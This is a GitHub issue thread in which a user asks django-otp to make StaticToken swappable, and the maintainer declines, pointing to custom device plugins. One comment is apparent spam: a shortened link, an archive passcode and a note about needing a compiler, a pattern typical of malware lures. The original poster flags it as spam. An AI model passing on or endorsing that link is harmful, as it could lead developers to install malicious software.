### ISSUE TITLE
Feature request: make `StaticToken` a swappable model

### ISSUE THREAD

**Issue by sterliakov** [django-otp/django-otp#160]
I propose to provide a simpler way to customize static device's tokens. Currently reusing `StaticDevice` logic with another token model is non-trivial and results in having an unused `StaticToken` model provided by the plugin.

If it could be `swappable = 'OTP_STATIC_TOKEN_MODEL'`, this problem would be easier to tackle by providing a replacement model.

My use case: I'd like to track a date when a token was issued and display this date to the user. This is important for UX (provides a convenient time anchor for those who can't remember where they saved this token) and also allows me to recommend token rotation after a year. To do so in a clean way, I need to add `issued_at` field to the token model.

Currently I rely on the creation date of `StaticDevice`, but this means I have to drop and recreate the device every time the recovery token is used. This works well, but providing a custom token implementation looks saner to me.

This should also help with #68 (users will be able to provide such implementation themselves, or an alternative hash-based model could be shipped with the plugin). This will also make supporting longer tokens (e.g. something human-readable needs more than 16 bytes of entropy to fly) trivial.

[x] I'm ready to contribute this change if agreed

**Comment by psagers** [comment]
A regular friendly reminder that the device implementations built into django-otp are all small, simple, and [un-licensed](https://github.com/django-otp/django-otp/blob/master/LICENSE). They serve as demos as much as working implementations. All developers are welcome, indeed encouraged, to use them as inspiration or starting points for their own private or public device plugins that serve their particular purposes.

The goal is for all extensibility to be covered by the existing device plugin model, rather than going down the rabbit hole of supporting plugins for plugins for plugins.

Thanks

**Comment by tinsn** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by sterliakov** [comment]
Alright, got it - feel free to close this issue then:)

And @psagers please remove the spam above.
